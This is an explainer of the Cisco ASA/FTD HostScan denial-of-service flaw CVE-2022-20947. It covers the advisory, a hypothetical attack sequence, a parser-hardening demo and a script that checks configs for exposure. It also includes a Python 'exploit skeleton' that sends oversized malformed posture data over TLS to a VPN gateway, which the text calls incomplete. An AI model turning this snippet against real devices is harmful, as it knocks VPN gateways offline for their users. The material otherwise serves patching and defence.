In November 2022, Cisco disclosed a critical vulnerability tracked as CVE-2022-20947, affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. If you're managing Cisco security infrastructure, this is a must-know: an unauthenticated remote attacker who can reach the VPN service can force the device to reload by sending specially crafted HostScan posture data, with no password or account needed.
This article will break down CVE-2022-20947 in plain English, explain how it works, review the original advisory, and walk through a hypothetical exploit scenario. We’ll also include code snippets and links to official references so you can dig deeper or patch your devices ASAP.
Official Reference:
Cisco Security Advisory: cisco-sa-asa-ftd-dap-dos-GhYZBxDU
What is Dynamic Access Policy (DAP) and HostScan?
Dynamic Access Policy (DAP) lets network admins create rules that control access based on the posture of devices—such as what antivirus they use, if the OS is updated, etc. To collect this info, Cisco uses the HostScan module, which runs on user machines and reports security posture back to the ASA/FTD.
In short:
- HostScan collects device security info
- DAP uses that info to allow/deny remote access
Vulnerability Summary
> CVE-2022-20947
> "Improper processing of HostScan data received from the Posture (HostScan) module in Cisco ASA/FTD lets unauthenticated, remote attackers cause a device reload (crash), leading to a Denial of Service (DoS)."
- Malformed HostScan data is processed before any user authentication, so anyone who can reach the VPN service can submit it.
- ASA/FTD does not validate this data properly, and the failure takes the whole device down (reload), not just one session.
Let's say a company uses Cisco AnyConnect VPN (which relies on HostScan and DAP). An attacker:
1. Finds the public VPN gateway (ASA/FTD device).
2. Opens a connection to the remote-access VPN service as an unauthenticated client; no account or credentials are required.
3. Sends a specially crafted HostScan data structure during posture checking. Instead of real posture results, the attacker sends malformed/bogus data.
4. The device tries to process this data, fails, and crashes (reloads). All users connected through the firewall lose access.
The attacker can *repeat this cycle endlessly to maintain a DoS.*
Crafted HostScan Data: What Does It Look Like?
The exploit hinges on how the firewall parses HostScan posture data. The Cisco advisory does not publish a payload or the internal data format (to protect customers). Based on the general class of input-handling bugs, plausible triggers are a declared length that disagrees with the data actually sent, unexpected or unknown fields, or values of the wrong type for the field.
The examples below assume an XML-style encoding purely for readability. The advisory does not state the wire format, and a real posture report is exchanged inside the established SSL VPN session rather than as a bare document.
Hypothetical Malformed HostScan XML (Example)
<?xml version="1.0" encoding="UTF-8"?>
<hostscan>
<property name="os" value="Windows 10"/>
<property name="av" value="Symantec"/>
<!-- bogus_field carries an overly large payload -->
<property name="bogus_field" value="AAAAAAAAAAAAAAAAAAAAAA...."/>
</hostscan>
A specially crafted *bogus_field* (maybe very long or weird characters) could trigger the crash.
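To make the bug class concrete, here is an added example that is not from the advisory or from Cisco: a constructed, length-prefixed posture record format (type byte, 2-byte length, value; this is an assumption for illustration and NOT HostScan's real wire format) with a naive parser that trusts the declared length and type tag beside a hardened parser that bounds-checks everything. The naive parser raises on the same three malformations the text lists (bad length, unknown/invalid type, oversized report), which is the software equivalent of the daemon falling over; the hardened one rejects the record and keeps running.

```python
import struct

# Constructed posture record format for illustration only (NOT Cisco's real
# HostScan format): a sequence of attributes, each encoded as
#   1-byte type | 2-byte big-endian length | value bytes
# Assumed type tags: 1 = string, 2 = unsigned 32-bit integer.
T_STRING, T_U32 = 1, 2
MAX_RECORD_LEN = 4096      # assumed upper bound on a whole posture report
MAX_ATTR_LEN = 256         # assumed upper bound on a single attribute value


def encode_attr(atype: int, value) -> bytes:
    """Build one attribute the way a well-behaved client would."""
    if atype == T_STRING:
        payload = value.encode()
    elif atype == T_U32:
        payload = struct.pack(">I", value)
    else:
        raise ValueError("unknown type")
    return struct.pack(">BH", atype, len(payload)) + payload


def parse_naive(data: bytes) -> list:
    """Vulnerable parser: trusts the declared length and the type tag.
    A short buffer, a bogus tag or a mis-sized integer makes struct/decode
    raise, i.e. the process crashes on untrusted input."""
    attrs, pos = [], 0
    while pos < len(data):
        atype, length = struct.unpack_from(">BH", data, pos)
        pos += 3
        payload = data[pos:pos + length]    # may be shorter than `length`
        pos += length
        if atype == T_STRING:
            attrs.append(payload.decode())  # bogus bytes -> UnicodeDecodeError
        else:
            attrs.append(struct.unpack(">I", payload)[0])  # short -> struct.error
    return attrs


def parse_hardened(data: bytes):
    """Hardened parser: bounds-checks every length, whitelists type tags and
    returns None on any violation instead of raising."""
    if len(data) > MAX_RECORD_LEN:
        return None                           # oversized report
    attrs, pos = [], 0
    while pos < len(data):
        if len(data) - pos < 3:
            return None                       # truncated header
        atype, length = struct.unpack_from(">BH", data, pos)
        pos += 3
        if length > MAX_ATTR_LEN or len(data) - pos < length:
            return None                       # declared length exceeds buffer
        payload = data[pos:pos + length]
        pos += length
        if atype == T_STRING:
            try:
                attrs.append(payload.decode("ascii"))
            except UnicodeDecodeError:
                return None
        elif atype == T_U32:
            if length != 4:
                return None                   # wrong size for the declared type
            attrs.append(struct.unpack(">I", payload)[0])
        else:
            return None                       # unknown attribute type
    return attrs


def crashes(parser, data: bytes) -> bool:
    """True if the parser raises on `data` (the DoS condition being modelled)."""
    try:
        parser(data)
        return False
    except Exception:
        return True


# Constructed sample inputs
GOOD = encode_attr(T_STRING, "Windows 10") + encode_attr(T_U32, 4)
# Declared length 0xFFFF but only one byte follows: length/data mismatch
BAD_LENGTH = encode_attr(T_STRING, "Windows 10") + struct.pack(">BH", T_U32, 0xFFFF) + b"\x00"
# Unknown type tag 9 carrying two bytes: invalid type
BAD_TYPE = struct.pack(">BH", 9, 2) + b"\x00\x01"
# One 10000-byte string attribute: oversized report
OVERSIZED = encode_attr(T_STRING, "A" * 10000)

if __name__ == "__main__":
    for name, sample in [("GOOD", GOOD), ("BAD_LENGTH", BAD_LENGTH),
                         ("BAD_TYPE", BAD_TYPE), ("OVERSIZED", OVERSIZED)]:
        print(f"{name:10} naive crashes={crashes(parse_naive, sample)} "
              f"hardened result={parse_hardened(sample)}")
```

The point of the pair is the shape of the fix: every length is checked against the bytes actually received and against a policy maximum, every type tag is whitelisted, and a violation rejects the record instead of propagating an exception up to whatever holds the device together.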
Example Python Exploit Skeleton
This is an illustrative Python snippet showing how an attacker might simulate connection and send malformed HostScan data. Note: For education and defense use only!
import socket
import ssl

# Target: the public SSL VPN gateway (default TCP 443; some deployments use 8443)
target = ("vpn.company.com", 443)

# Malformed posture report: one oversized attribute value (XML encoding is assumed)
malicious_hostscan_data = b"""<?xml version="1.0"?>
<hostscan>
<property name="os" value="Windows 10"/>
<property name="crashme" value="%s"/>
</hostscan>
""" % (b"A" * 10000)  # Oversized value

# The SSL VPN service only speaks TLS, so wrap the TCP socket before sending.
# A real attack would also have to reproduce the AnyConnect session setup and
# the actual posture-upload exchange; this is an abstract example.
context = ssl.create_default_context()
with socket.create_connection(target) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname=target[0]) as s:
        s.sendall(malicious_hostscan_data)
*In real scenarios, a proof-of-concept would have to mimic the correct AnyConnect/SSL handshake protocol. This snippet is to demonstrate intent, not an out-of-the-box exploit.*
Affected Versions
Per Cisco's advisory, vulnerable ASA and FTD releases are affected only when DAP is configured and HostScan posture is in use. The advisory's version table is authoritative for which releases are vulnerable and which are fixed; check it against your exact release.
Not affected:
- Devices without DAP enabled
- Devices not using HostScan/Posture
Remediation
Cisco recommends upgrading to a fixed release as soon as possible.
Advisory and patched versions:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-dap-dos-GhYZBxDU
Additional mitigations while you schedule the upgrade:
- Restrict remote VPN access to known IPs if possible
- Monitor for unusual HostScan messages / device reloads
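Before scheduling the upgrade, it helps to know which gateways actually meet the advisory's preconditions. The following is an added example, not Cisco tooling: a small Python check that scans saved `show running-config` output for the two indicators this article describes, DAP records other than the built-in `DfltAccessPolicy` and `hostscan enable` under `webvpn` (older releases used `csd enable`; both spellings are accepted). The sample configuration is constructed; treating only custom DAP records as "DAP configured" is an assumption, and the advisory's version table remains the authoritative test.

```python
import re

# Constructed excerpt of `show running-config` from an ASA running remote-access
# VPN with HostScan posture and two DAP records. Indentation mirrors the
# single-space sub-mode style ASA uses.
SAMPLE_CONFIG = """\
hostname vpn-edge
webvpn
 enable outside
 hostscan image disk0:/hostscan-pkg.pkg
 hostscan enable
 anyconnect enable
dynamic-access-policy-record DfltAccessPolicy
dynamic-access-policy-record Corp-Posture
 user-message "Endpoint posture verified"
 action continue
"""

# Built-in record that exists on every ASA; its presence alone does not mean an
# admin has configured DAP (assumption used by this check).
DEFAULT_DAP = "DfltAccessPolicy"
POSTURE_ENABLE_LINES = {"hostscan enable", "csd enable"}


def parse_exposure(config: str) -> dict:
    """Return the indicators this advisory hinges on, as summarised above:
    custom DAP records plus HostScan posture enabled under webvpn."""
    dap_records = re.findall(r"^dynamic-access-policy-record\s+(\S+)", config, re.M)
    custom_dap = [r for r in dap_records if r != DEFAULT_DAP]

    in_webvpn, posture_enabled = False, False
    for line in config.splitlines():
        if not line.startswith(" "):
            # Top-level command: track whether we just entered `webvpn` mode
            in_webvpn = line.strip() == "webvpn"
            continue
        if in_webvpn and line.strip() in POSTURE_ENABLE_LINES:
            posture_enabled = True

    return {
        "dap_records": dap_records,
        "custom_dap_records": custom_dap,
        "hostscan_enabled": posture_enabled,
        # Meets the preconditions the article lists; still confirm the release
        # against the advisory's version table.
        "exposed": bool(custom_dap) and posture_enabled,
    }


if __name__ == "__main__":
    result = parse_exposure(SAMPLE_CONFIG)
    print(f"DAP records:        {result['dap_records']}")
    print(f"custom DAP records: {result['custom_dap_records']}")
    print(f"HostScan enabled:   {result['hostscan_enabled']}")
    print(f"exposed:            {result['exposed']}")
```

Run it over the saved running-config of each gateway (for example, output collected by your configuration backup job) to build the list of devices to patch first; a gateway that reports `exposed: False` still needs the upgrade eventually, just with less urgency.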
Resources & References
- Cisco Security Advisory: cisco-sa-asa-ftd-dap-dos-GhYZBxDU
- Cisco Dynamic Access Policies (DAP) Whitepaper
Conclusion
CVE-2022-20947 is a strong reminder that unauthenticated bugs in security gear can have big consequences. If your Cisco firewalls run DAP with HostScan, prioritize these patches; otherwise an attacker can take your VPN gateway down in moments, no login or VPN account needed.
Stay safe, and remember: Always keep your security appliances up to date!
Timeline
Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/21/2022 15:39:00 UTC